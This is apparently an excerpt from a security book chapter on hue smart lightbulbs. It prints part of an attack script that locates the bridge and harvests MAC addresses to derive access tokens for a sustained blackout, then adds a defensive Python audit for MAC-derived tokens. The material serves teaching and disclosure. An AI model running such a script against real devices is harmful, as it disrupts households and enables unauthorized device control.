Example 1-1 contains the complete source code for the script.
Example 1-1. hue_blackout.bash
#!/bin/bash

# This script demonstrates how malware can cause a sustained blackout on the
# Philips hue lightbulb system.
#
# By design, the hue client software uses the MD5 hash of the user's MAC
# address to register with the hue bridge.
#
# This script collects the ARP addresses on the victim's laptop or desktop
# to locate devices on the network that are likely to have been registered
# with the bridge. It then calculates the MD5 hashes of each of the addresses
# and uses the output to connect to the hue bridge and issue a command to
# turn all the lights off. Once it finds a working token, it infinitely loops
# through the same request, causing a continuous blackout (i.e., the lights
# turn off again if the user physically switches the bulbs off and then on
# again). If the user deregisters the associated device, the script goes back
# to looking for more valid MAC addresses. If the user reregisters the same
# device, the script will again cause a sustained blackout and repeat the
# process.
#
# Written by Nitesh Dhanjani

# Get the internal IP of the bridge, which is advertised on the meethue portal.
while [ -z "$bridge_ip" ];
do
    bridge_ip=($(curl --connect-timeout 5 -s https://www.meethue.com/api/nupnp \
        | awk '{match($0,/[0-9]+.[0-9]+.[0-9]+.[0-9]+/); ip = substr($0,RSTART,RLENGTH); print ip}'))

    # If no bridge is found, try again in 10 minutes.
    if [ -z "$bridge_ip" ];
    then
        sleep 600
    fi
done

# Bridge found, let's cycle through the MAC addresses and cause a blackout.
echo "Found bridge at $bridge_ip"

# We never break out of this loop ;-)
while true;
do
    # Get MAC addresses from the ARP table
    mac_addresses=( $(arp -a | awk '{print toupper($4)}') )

    # Cycle through the list
    for m in "${mac_addresses[@]}"
    do

CHAPTER 1: LIGHTS OUT—HACKING WIRELESS LIGHTBULBS TO CAUSE SUSTAINED BLACKOUTS
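
A defensive counterpart to the weakness described in the script's header comment, as an added example that is not from the book: it takes a list of tokens registered on a bridge and the MAC addresses seen on the network, and flags every token that is simply the MD5 of a MAC. The function names, the sample data, and the exact string form hashed (colon-separated, upper or lower case) are assumptions; the page only states that the token is the MD5 hash of the MAC address.

```python
# Added example, not from the book: audit bridge tokens for MAC-derived values.
import hashlib
import re


def normalize_mac(raw):
    """Return AA:BB:CC:DD:EE:FF, or None if raw is not a MAC address.

    Accepts ':' or '-' separators and unpadded octets, since BSD/macOS
    `arp -a` prints entries such as 0:4:5a:fd:83:f9.
    """
    parts = re.split(r"[:-]", raw.strip())
    if len(parts) != 6 or not all(re.fullmatch(r"[0-9A-Fa-f]{1,2}", p) for p in parts):
        return None
    return ":".join(p.zfill(2).upper() for p in parts)


def mac_tokens(mac):
    """MD5 hex digests of the string forms this audit assumes a client may hash."""
    return {hashlib.md5(form.encode("ascii")).hexdigest() for form in (mac, mac.lower())}


def audit(registered_tokens, observed_macs):
    """Map each registered token that is derivable from an observed MAC to that MAC."""
    derived = {}
    for raw in observed_macs:
        mac = normalize_mac(raw)
        if mac is None:  # skips non-address fields such as "(incomplete)"
            continue
        for token in mac_tokens(mac):
            derived[token] = mac
    return {t: derived[t.lower()] for t in registered_tokens if t.lower() in derived}


# Constructed sample data: MACs as an ARP table might list them, and a token
# list as an administrator might export it from the bridge.
SAMPLE_MACS = ["0:4:5a:fd:83:f9", "(incomplete)", "A4-5E-60-C1-02-3B"]
SAMPLE_TOKENS = [
    hashlib.md5(b"00:04:5A:FD:83:F9").hexdigest(),  # MAC-derived, guessable
    "3f9c1e7a5b2d4c68a0e1f2b3c4d5e6f7",             # constructed, not MAC-derived
]

if __name__ == "__main__":
    for token, mac in audit(SAMPLE_TOKENS, SAMPLE_MACS).items():
        print(f"WEAK: token {token} is the MD5 of MAC {mac}")
```

Any token the audit reports can be recomputed by whoever can read the same ARP table, which is the property the script above depends on.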